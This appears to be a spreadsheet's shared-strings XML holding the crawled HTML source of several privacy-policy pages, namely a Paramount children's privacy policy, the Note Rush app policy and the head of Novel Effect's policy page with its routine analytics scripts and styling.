    <t xml:space="preserve">If this takes place, these disclosures may constitute a "sale" under California law. Where we engage in this type of disclosure, we give you the option to opt in to these disclosures, if you are under 16, or opt out if you are 16 and over at any time by following the instructions on the "Do Not Sell My Personal Information" link on the  home page of the relevant website, mobile and online application, or other Service.   Please note that, when you use these tools on our properties, you will need to renew your choices if you clear your cookies or use a new browser or device.&lt;/p&gt;&lt;p&gt;If you are a California resident under the age of 18, and a registered user of the website where this Privacy Policy is posted, you may request removal of content or information you have publicly posted.  </t>
  </si>
  <si>
    <t>Please be aware that such a request does not ensure complete removal of the content or information you posted from the Internet, and there may be circumstances in which the law does not require or allow removal.&lt;/p&gt;&lt;p&gt; For all requests under the  “California Shine the light/Eraser” Law, please use the Viacom CBS Privacy Rights Manager and fill out a request form, which can be found at &lt;a href="https://www.viacomcbsprivacy.com/managemyrights"&gt;https://www.viacomcbsprivacy.com/managemyrights&lt;/a&gt;.   We will accept requests to exercise these rights only through the contact form with a subject line that indicates that you are making a request under the “Eraser” laws and includes complete and accurate information.&lt;/p&gt;&lt;/div&gt;&lt;div class="content no-shift"&gt;&lt;h3&gt;Other Rights in Your Jurisdiction&lt;/h3&gt;&lt;p&gt;Depending on the applicable law in your jurisdiction, you may have additional rights, such as rights to access, correction and deletion of your Personal Information.</t>
  </si>
  <si>
    <t>If you have any questions about what rights and choices apply in your jurisdiction, please feel free to contact us.&lt;/p&gt;&lt;p&gt;You may also review our country-specific privacy notices in the Paramount general audience Privacy Policy &lt;a href="https://www.viacomcbsprivacy.com/policy"&gt;https://www.viacomcbsprivacy.com/policy&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Educational"&gt;Educational Services&lt;/h2&gt;&lt;p&gt;Some of our Services are available for teachers, schools, and school districts (&lt;strong&gt;“Schools”&lt;/strong&gt;) to use as part of an educational curriculum under the oversight of the School. These Services are designed to minimize the collection of Personal Information from children and to comply with student data privacy laws. When used by Schools, usernames, identifiers that may identify you or your device, and other information may be provided to us by a child’s School and associated with a class or grade level.</t>
  </si>
  <si>
    <t>The School will be able to see information regarding the child’s use of the Services in connection with a class and make changes to the child’s username and other information.   In some circumstances, teachers and other authorized personnel may create accounts for their students.&lt;/p&gt;&lt;p&gt; The School is solely responsible for providing notices and obtaining consents required by applicable student data privacy laws, including providing all required notices to parents, obtaining all necessary parent or guardian consents, or complying with applicable requirements of an exemption or exception from parental consent requirements.</t>
  </si>
  <si>
    <t>The School is also responsible for activities such as removing a child from class roster, deleting a class, or submitting a deletion request when a child’s Personal Information is no longer needed for School purposes.&lt;/p&gt;&lt;p&gt;If the Services are downloaded on a personal device, a parent or guardian may be able to view their child’s Personal Information (such as username and activities completed) by logging into the child’s class account. The parent can delete the application providing the Services from the child’s device, but the child’s Personal Information may continue to be associated with the School’s class account until the School deletes that Personal Information. If you are a parent and have questions about reviewing, modifying, or deleting your child’s Personal Information, please contact your child’s School directly.&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Changes"&gt;Changes to this Children’s Privacy Policy&lt;/h2&gt;&lt;p&gt;From time to time, we may change this Privacy Policy to accommodate new technologies, industry practices, regulatory requirements or for other purposes.</t>
  </si>
  <si>
    <t>We will provide notice to you if these changes are material and, where required by applicable law, we will obtain your consent. Notice may be by email to you at the last email address you provided us, by posting notice of such changes on our websites, applications and Services, or by other means, consistent with applicable law.&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Contact"&gt;Contact Us&lt;/h2&gt;&lt;p&gt;If you have any questions about this Privacy Policy, you may contact us through our parents’ webform &lt;a href="https://www.viacomcbsprivacy.com/parentalrights"&gt;https://www.viacomcbsprivacy.com/parentalrights&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;If you are in the U.S., you may also contact us by email us at &lt;a href="mailto:</t>
  </si>
  <si>
    <t>kidsprivacy@viacomcbs.com"&gt;kidsprivacy@viacomcbs.com&lt;/a&gt; with the subject line “Privacy Rights,” by calling &lt;a href="tel:1 (888) 721-2848"&gt;1 (888) 721-2848&lt;/a&gt; or by writing to us at:&lt;/p&gt;&lt;p&gt;&lt;div class="no-shift"&gt;Paramount Privacy Team&lt;/div&gt;&lt;div class="no-shift"&gt;1515 Broadway&lt;/div&gt;&lt;div class="no-shift"&gt;New York, NY 10036&lt;/div&gt;&lt;/p&gt;&lt;/div&gt;&lt;script src='/assets/js/main.js' type='text/javascript'&gt;&lt;/script&gt;&lt;/main&gt;&lt;footer&gt;&lt;div class="content"&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="/policy"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/cookies"&gt;Cookie Policy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/donotsell"&gt;Do Not Sell My Personal Information&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&amp;copy;2023</t>
  </si>
  <si>
    <t>Paramount - All rights reserved&lt;/p&gt;&lt;/div&gt;&lt;/footer&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
	&lt;meta property="og:title" content="Privacy Policy - Note Rush" /&gt;
    &lt;meta property="og:type" content="website" /&gt;
    &lt;meta property="og:image" content="https://www.noterushapp.com/_index_media/noterush-ogimg.png" /&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"&gt;
    &lt;title&gt;Privacy Policy - Note Rush&lt;/title&gt;
    &lt;meta name="description" content="Got a question about NoteRush?   Contact us here!"&gt;
	&lt;meta name="robots" content=""&gt;
    &lt;link href="https://www.noterush.app/assets/css/vanilla-bootstrap3.235eea0523c0.css" rel="stylesheet"&gt;
    &lt;link href="https://www.noterush.app/assets/css/noterush.css" rel="stylesheet"&gt;
    &lt;link rel="apple-touch-icon" sizes="180x180" href="https://www.noterush.app/assets/favicons/apple-touch-icon.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="32x32" href="https://www.noterush.app/assets/favicons/favicon-32x32.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="16x16" href="https://www.noterush.app/assets/favicons/favicon-16x16.png"&gt;
    &lt;link rel="manifest" href="https://www.noterush.app/assets/favicons/manifest.json"&gt;
    &lt;link rel="mask-icon" href="https://www.noterush.app/assets/favicons/safari-pinned-tab.svg" color="#5bbad5"&gt;
    &lt;link rel="shortcut icon" href="https://www.noterush.app/assets/favicons/favicon.ico"&gt;
    &lt;meta name="msapplication-config" content="https://www.noterush.app/assets/favicons/browserconfig.xml"&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
&lt;/head&gt;
&lt;body class="url-"&gt;
&lt;nav id="navbar-main" class="navbar navbar-default navbar-fixed-top"&gt;
    &lt;div class="container"&gt;
        &lt;div class="navbar-header"&gt;
            &lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"&gt;
                &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;/button&gt;
            &lt;a class="navbar-brand" href="https://www.noterush.app/"&gt;Note Rush&lt;/a&gt;
        &lt;/div&gt;
        &lt;div id="navbar" class="collapse navbar-collapse"&gt;
            &lt;ul class="nav navbar-nav"&gt;
                &lt;li&gt;
                    &lt;a href="/troubleshooting/"&gt;
                        &lt;span&gt;Troubleshooting&lt;/span&gt;
                    &lt;/a&gt;
                &lt;/li&gt;
                &lt;li&gt;
                    &lt;a href="/contact-us/"&gt;
                        &lt;span&gt;Contact Us&lt;/span&gt;
                    &lt;/a&gt;
                 &lt;/li&gt;
                &lt;li class="active"&gt;
                    &lt;a href="/privacy/"&gt;
                        &lt;span&gt;Privacy&lt;/span&gt;
                    &lt;/a&gt;
                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/nav&gt;
&lt;div style="height: 50px;"&gt;&lt;/div&gt;
&lt;div class="container"&gt;
    &lt;div class="main-content"&gt;
&lt;div class="regions"&gt;
    &lt;div class="region content html"&gt;
        &lt;div class="r-content" &gt;&lt;h1&gt;Privacy Policy&lt;/h1&gt;
            &lt;p&gt;We respect your privacy. Note Rush doesn't collect any personal or sensivite information, 
            however anonymous usage data is collected through Unity Analytics to help us understand how people are using Note Rush features in aggregate,
            and to help identify and address technical issues that come up for subsets of users.&lt;/p&gt;
            &lt;p&gt;_x005F_x000D_
                Unity Analytics collects device information, like IP address, device model and operating system version, as well as events completed or actions taken within Note Rush,_x005F_x000D_
                including level choices, completion times and options selected. Using Unity Analytics systems, the developer of Note Rush has ongoing access to this data._x005F_x000D_
                </t>
  </si>
  <si>
    <t xml:space="preserve">This data is based, in part, on your game activities, but does not specifically identify you or your device._x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
            &lt;p&gt;_x005F_x000D_
                &lt;h4&gt;June 2020 Update&lt;/h4&gt;_x005F_x000D_
                 The Unity engine provides functionality on Android to request a device's Android Device ID and Advertising ID. Note Rush does NOT request, store or transmit this information, however_x005F_x000D_
                </t>
  </si>
  <si>
    <t xml:space="preserve">Google Play has recently started detecting this code in all Unity-based apps and has resultingly flagged Note Rush as an app that collects personal/sensitive information._x005F_x000D_
                Unity has since fixed this glitch so the offending code shouldn't be present in Note Rush in the next update. We will request that Google Play remove this flag at that time._x005F_x000D_
            &lt;/p&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;script src="https://www.noterush.app/assets/js/jquery.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.noterush.app/assets/js/bootstrap.min.js"&gt;&lt;/script&gt;
&lt;div id="fb-root"&gt;&amp;nbsp;&lt;/div&gt;
&lt;script&gt;
(function(d, s, id) {
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)) return;
    js = d.createElement(s); js.id = id;
    js.src = "//connect.facebook.net/en_GB/sdk.js#xfbml=1&amp;version=v2.6";
    fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
&lt;/script&gt;
&lt;script&gt;
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79435520-1', 'auto');
ga('send', 'pageview');
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" dir="ltr"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
		&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;!-- This site is optimized with the Yoast SEO Premium plugin v20.3 (Yoast SEO v20.5) - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;privacy-policy - Novel Effect&lt;/title&gt;
	&lt;meta name="description" content="We created the Novel Effect Privacy Policy to explain the way information is collected from users and how and when we disclose or use it." /&gt;
	&lt;link rel="canonical" href="https://noveleffect.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="privacy-policy" /&gt;
	&lt;meta property="og:description" content="We created the Novel Effect Privacy Policy to explain the way information is collected from users and how and when we disclose or use it."</t>
  </si>
  <si>
    <t>/&gt;
	&lt;meta property="og:url" content="https://noveleffect.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Novel Effect" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/noveleffect/" /&gt;
	&lt;meta property="article:modified_time" content="2022-08-10T14:48:58+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:site" content="@Novel_Effect" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="9 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://noveleffect.com/privacy-policy/","url":"https://noveleffect.com/privacy-policy/","name":"privacy-policy - Novel Effect","isPartOf":{"@id":"https://noveleffect.com/#website"},"datePublished":"2021-02-07T06:18:56+00:00","dateModified":"2022-08-10T14:48:58+00:00","description":"We created the Novel Effect Privacy Policy to explain the way information is collected from users and how and when we disclose or use it. ","breadcrumb":{"@id":"https://noveleffect.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://noveleffect.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://noveleffect.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://noveleffect.com/"},{"@type":"ListItem","position":2,"name":"privacy-policy"}]},{"@type":"WebSite","@id":"https://noveleffect.com/#website","url":"https://noveleffect.com/","name":"Novel Effect","description":"Read Aloud Books","publisher":{"@id":"https://noveleffect.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://noveleffect.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://noveleffect.com/#organization","name":"Novel Effect","url":"https://noveleffect.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://noveleffect.com/#/schema/logo/image/","url":"https://noveleffect.com/wp-content/uploads/2021/02/Full-Logo_Rectangle_TransparentBG-e1612743964694.png","contentUrl":"https://noveleffect.com/wp-content/uploads/2021/02/Full-Logo_Rectangle_TransparentBG-e1612743964694.png","width":600,"height":328,"caption":"Novel Effect"},"image":{"@id":"https://noveleffect.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/noveleffect/","https://twitter.com/Novel_Effect","https://www.instagram.com/novel_effect/","https://www.linkedin.com/company/novel-effect-inc-","https://www.pinterest.com/novel_effect/","https://www.youtube.com/noveleffect"]}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO Premium plugin.</t>
  </si>
  <si>
    <t>--&gt;
&lt;link rel='dns-prefetch' href='//s0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//www.dwin1.com' /&gt;
&lt;link rel='dns-prefetch' href='//secure.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//stats.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//widgets.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//jetpack.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//public-api.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//0.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//1.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//2.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//c0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//i0.wp.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Novel Effect &amp;raquo; Feed" href="https://noveleffect.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Novel Effect &amp;raquo; Comments Feed" href="https://noveleffect.com/comments/feed/" /&gt;
		&lt;! -- This site uses the Google Analytics by MonsterInsights plugin v8.14.1 - Using Analytics tracking - https://www.monsterinsights.com/ --&gt;
							&lt;script src="//www.googletagmanager.com/gtag/js?id=G-K6T4WVP7HG"  data-cfasync="false" data-wpfc-render="false" async&gt;&lt;/script&gt;
			&lt;script data-cfasync="false" data-wpfc-render="false"&gt;
				var mi_version = '8.14.1';
				var mi_track_user = true;
				var mi_no_track_reason = '';
								var disableStrs =</t>
  </si>
  <si>
    <t>[
										'ga-disable-G-K6T4WVP7HG',
															'ga-disable-UA-71476104-1',
									];
				/* Function to detect opted out users */
				function __gtagTrackerIsOptedOut() {
					for (var index = 0; index &lt; disableStrs.length; index++) {
						if (document.cookie.indexOf(disableStrs[index] + '=true') &gt; -1) {
							return true;
						}
					}
					return false;
				}
				/* Disable tracking if the opt-out cookie exists. */
				if (__gtagTrackerIsOptedOut()) {
					for (var index = 0; index &lt; disableStrs.length; index++) {
						window[disableStrs[index]] = true;
					}
				}
				/* Opt-out function */
				function __</t>
  </si>
  <si>
    <t>gtagTrackerOptout() {
					for (var index = 0; index &lt; disableStrs.length; index++) {
						document.cookie = disableStrs[index] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
						window[disableStrs[index]] = true;
					}
				}
				if ('undefined' === typeof gaOptout) {
					function gaOptout() {
						__gtagTrackerOptout();
					}
				}
								window.dataLayer = window.dataLayer || [];
				window. MonsterInsightsDualTracker = {
					helpers: {},
					trackers: {},
				};
				if (mi_track_user) {
					function __gtagDataLayer() {
						dataLayer.push(arguments);
					}
					function __gtagTracker(type, name, parameters) {
						if (!parameters) {
							parameters = {};
						}
						if (parameters.send_to) {
							__gtagDataLayer.apply(null, arguments);
							return;
						}
						if (type === 'event') {
														parameters.send_to = monsterinsights_frontend.v4_id;
							var hookName</t>
  </si>
  <si>
    <t>gtagTracker('js', new Date());
					__gtagTracker('set', {
						'developer_id.dZGIzZG': true,
											});
										__gtagTracker('config', 'G-K6T4WVP7HG', {"forceSSL":"true"} );
															__gtagTracker('config', 'UA-71476104-1', {"forceSSL":"true"} );
										window.gtag = __gtagTracker;										(function () {
						/* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */
						/* ga and __ gaTracker compatibility shim. */
						var noopfn = function () {
							return null;
						};
						var newtracker = function () {
							return new Tracker();
						};
						var Tracker = function () {
							return null;
						};
						var p = Tracker.prototype;
						p.get = noopfn;
						p.set = noopfn;
						p.send = function () {
							var args = Array.prototype.slice.call(arguments);
							args.unshift('send');
							__gaTracker.apply(null, args);
						};
						var __</t>
  </si>
  <si>
    <t>gaTracker = function () {
							var len = arguments.length;
							if (len === 0) {
								return;
							}
							var f = arguments[len - 1];
							if (typeof f ! == 'object' || f === null || typeof f.hitCallback ! == 'function') {
								if ('send' === arguments[0]) {
									var hitConverted, hitObject = false, action;
									if ('event' === arguments[1]) {
										if ('undefined' !</t>
  </si>
  <si>
    <t>gaMap.hasOwnProperty(arg))) {
										hit[gaMap[arg]] = args[arg];
									} else {
										hit[arg] = args[arg];
									}
								}
								return hit;
							}
							try {
								f.hitCallback();
							} catch (ex) {
							}
						};
						__gaTracker.create = newtracker;
						__gaTracker.getByName = newtracker;
						__</t>
  </si>
  <si>
    <t>gaTracker.getAll = function () {
							return [];
						};
						__ gaTracker.remove = noopfn;
						__ gaTracker.loaded = true;
						window['__gaTracker'] = __gaTracker;
					})();
									} else {
										console.log("");
					(function () {
						function __gtagTracker() {
							return null;
						}
						window['__gtagTracker'] = __gtagTracker;
						window['gtag'] = __gtagTracker;
					})();
									}
			&lt;/script&gt;
				&lt;!--</t>
  </si>
  <si>
    <t>/ Google Analytics by MonsterInsights --&gt;
		&lt;link rel="stylesheet" type="text/css" href="https://use.typekit.net/crp7rzp.css"&gt;&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em ! important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wc-blocks-integration-css' href='https://noveleffect.com/wp-content/plugins/woocommerce-payments/vendor/woocommerce/subscriptions-core/build/index.css?ver=5.5.0' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-blocks-checkout-style-css' href='https://noveleffect.com/wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css?ver=1.0' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.2/wp-includes/css/dist/block-library/style.min.css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css'&gt;
.has-text-align-justify{text-align:justify;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-blocks-vendors-style-css' href='https://c0.wp.com/p/woocommerce/7.5.1/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-blocks-style-css' href='https://c0.wp.com/p/woocommerce/7.5.1/packages/woocommerce-blocks/build/wc-blocks-style.css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://c0.wp.com/c/6.2/wp-includes/css/classic-themes.min.css' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;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</si>
  <si>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rel='stylesheet' id='woocommerce-layout-css' href='https://c0.wp.com/p/woocommerce/7.5.1/assets/css/woocommerce-layout.css' media='all' /&gt;
&lt;style id='woocommerce-layout-inline-css'&gt;
	.infinite-scroll .woocommerce-pagination {
		display: none;
	}
&lt;/style&gt;
&lt;link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://c0.wp.com/p/woocommerce/7.5.1/assets/css/woocommerce-smallscreen.css' media='only screen and (max-width: 768px)' /&gt;
&lt;link rel='stylesheet' id='woocommerce-general-css' href='https://c0.wp.com/p/woocommerce/7.5.1/assets/css/woocommerce.css' media='all' /&gt;
&lt;style id='woocommerce-inline-inline-css'&gt;
.woocommerce form .form-row .required { visibility: visible; }
&lt;/style&gt;
&lt;link rel='stylesheet' id='hello-elementor-css' href='https://noveleffect.com/wp-content/themes/hello-elementor/style.min.css?ver=2.6.1' media='all' /&gt;
&lt;link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://noveleffect.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.6.1' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-css' href='https://noveleffect.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.18.0' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-frontend-legacy-css' href='https://noveleffect.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.11.5' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-frontend-css' href='https://noveleffect.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.11.5' media='all' /&gt;
&lt;style id='elementor-frontend-inline-css'&gt;
.elementor-kit-1786{--e-global-color-primary:#1A2C38;--e-global-color-secondary:#4BB6C2;--e-global-color-text:#768088;--e-global-color-accent:#81CCD4;--e-global-color-e7e891d:#E0735A;--e-global-color-7049101:#E7B945;--e-global-color-2034c96:#584282;--e-global-color-5d911c1:#D1D5D7;--e-global-color-500d4a5:#F3F0E1;--e-global-color-ee1913c:#E5DBBD;--e-global-typography-primary-font-family:"museo-sans-rounded";--e-global-typography-primary-font-weight:900;--e-global-typography-secondary-font-family:"museo-sans-rounded";--e-global-typography-secondary-font-weight:700;--e-global-typography-text-font-family:"museo-sans-rounded";--e-global-typography-text-font-size:18px;--e-global-typography-text-font-weight:300;--e-global-typography-accent-font-family:"museo-sans-rounded";--e-global-typography-accent-font-size:14px;--e-global-typography-accent-font-weight:700;--e-global-typography-accent-text-transform:uppercase;--e-global-typography-accent-letter-spacing:1.4px;--e-global-typography-a658eba-font-family:"museo-slab";--e-global-typography-a658eba-font-weight:700;--e-global-typography-47ee454-font-family:"museo-sans-rounded";--e-global-typography-47ee454-font-size:14px;--e-global-typography-47ee454-font-weight:500;color:var( --e-global-color-primary );font-family:"museo-sans-rounded", Sans-serif;font-size:14px;font-weight:500;line-height:2em;}.elementor-kit-1786 a{color:var( --e-global-color-secondary );}.elementor-kit-1786 a:hover{color:var( --e-global-color-accent );}.elementor-kit-1786 h1{font-size:48px;line-height:1.2em;}.elementor-kit-1786 h2{font-size:40px;line-height:1.2em;}.elementor-kit-1786 h3{font-size:20px;line-height:1.4em;}.elementor-kit-1786 h4{font-size:20px;}.elementor-kit-1786 h5{font-size:18px;text-transform:uppercase;}.elementor-kit-1786 h6{font-size:18px;text-transform:uppercase;line-height:1.5em;letter-spacing:0.2em;}.elementor-kit-1786 button,.elementor-kit-1786 input[type="button"],.elementor-kit-1786 input[type="submit"],.elementor-kit-1786 .elementor-button{font-family:var( --e-global-typography-accent-font-family ), Sans-serif;font-size:var( --e-global-typography-accent-font-size );font-weight:var( --e-global-typography-accent-font-weight );text-transform:var( --e-global-typography-accent-text-transform );letter-spacing:var( --e-global-typography-accent-letter-spacing );color:#ffffff;background-color:var( --e-global-color-secondary );border-radius:50px 50px 50px</t>
  </si>
  <si>
    <t>50px;padding:0.7em 2em 0.7em 2em;}.elementor-kit-1786 button:hover,.elementor-kit-1786 button:focus,.elementor-kit-1786 input[type="button"]:hover,.elementor-kit-1786 input[type="button"]:focus,.elementor-kit-1786 input[type="submit"]:hover,.elementor-kit-1786 input[type="submit"]:focus,.elementor-kit-1786 .elementor-button:hover,.elementor-kit-1786 .elementor-button:focus{color:#FFFFFF;background-color:var( --e-global-color-accent );border-radius:50px 50px 50px 50px;}.elementor-kit-1786 label{font-size:14px;font-weight:bold;text-transform:uppercase;}.elementor-kit-1786 input:not([type="button"]):not([type="submit"]),.elementor-kit-1786 textarea,.elementor-kit-1786 .elementor-field-textual{background-color:#ffffff;border-radius:0px 0px 0px 0px;}.elementor-section.elementor-section-boxed &gt; .elementor-container{max-width:1140px;}.e-con{--container-max-width:1140px;}.elementor-widget:not(:last-child){margin-bottom:20px;}.elementor-element{--widgets-spacing:20px;}{}h1.entry-title{display:var(--page-title-display);}.elementor-kit-1786 e-page-transition{background-color:#FFBC7D;}@media(max-width:1024px){.elementor-kit-1786 h1{font-size:40px;}.elementor-kit-1786 h2{font-size:36px;}.elementor-kit-1786 h3{font-size:20px;}.elementor-kit-1786 h4{font-size:16px;}.elementor-kit-1786 h5{font-size:14px;}.elementor-kit-1786 h6{font-size:12px;}.elementor-kit-1786 button,.elementor-kit-1786 input[type="button"],.elementor-kit-1786 input[type="submit"],.elementor-kit-1786 .elementor-button{font-size:var( --e-global-typography-accent-font-size );letter-spacing:var( --e-global-typography-accent-letter-spacing );}.elementor-section.elementor-section-boxed &gt; .elementor-container{max-width:1024px;}.e-con{--container-max-width:1024px;}}@media(max-width:767px){.elementor-kit-1786 h1{font-size:36px;}.elementor-kit-1786 h2{font-size:32px;}.elementor-kit-1786 h3{font-size:20px;}.elementor-kit-1786 h4{font-size:16px;}.elementor-kit-1786 h5{font-size:14px;}.elementor-kit-1786 h6{font-size:12px;}.elementor-kit-1786 button,.elementor-kit-1786 input[type="button"],.elementor-kit-1786 input[type="submit"],.elementor-kit-1786 .elementor-button{font-size:var( --e-global-typography-accent-font-size );letter-spacing:var( --e-global-typography-accent-letter-spacing );}.elementor-section.elementor-section-boxed &gt; .elementor-container{max-width:767px;}.e-con{--container-max-width:767px;}}
.elementor-widget-heading .elementor-heading-title{color:var( --e-global-color-primary );font-family:var( --e-global-typography-primary-font-family ), Sans-serif;font-weight:var( --e-global-typography-primary-font-weight );}.elementor-widget-image .widget-image-caption{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-size:var( --e-global-typography-text-font-size );font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-size:var( --e-global-typography-text-font-size );font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:var( --e-global-color-primary );}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap, .elementor-widget-text-editor.elementor-drop-cap-view-default .elementor-drop-cap{color:var( --e-global-color-primary );border-color:var( --e-global-color-primary );}.elementor-widget-button .elementor-button{font-family:var( --e-global-typography-accent-font-family ), Sans-serif;font-size:var( --e-global-typography-accent-font-size );font-weight:var( --e-global-typography-accent-font-weight );text-transform:var( --e-global-typography-accent-text-transform );letter-spacing:var( --e-global-typography-accent-letter-spacing );background-color:var( --e-global-color-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans-serif;font-weight:var( --e-global-typography-secondary-font-weight );}.elementor-widget-divider.elementor-view-stacked .elementor-icon{background-color:var( --e-global-color-secondary );}.elementor-widget-divider.elementor-view-framed .elementor-icon, .elementor-widget-divider.elementor-view-default .elementor-icon{color:var( --e-global-color-secondary );border-color:var( --e-global-color-secondary );}.elementor-widget-divider.elementor-view-framed .elementor-icon, .elementor-widget-divider.elementor-view-default .elementor-icon svg{fill:var( --e-global-color-secondary );}.elementor-widget-image-box .elementor-image-box-title{color:var( --e-global-color-primary );font-family:var( --e-global-typography-primary-font-family ), Sans-serif;font-weight:var( --e-global-typography-primary-font-weight );}.elementor-widget-image-box .elementor-image-box-description{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-size:var( --e-global-typography-text-font-size );font-weight:var( 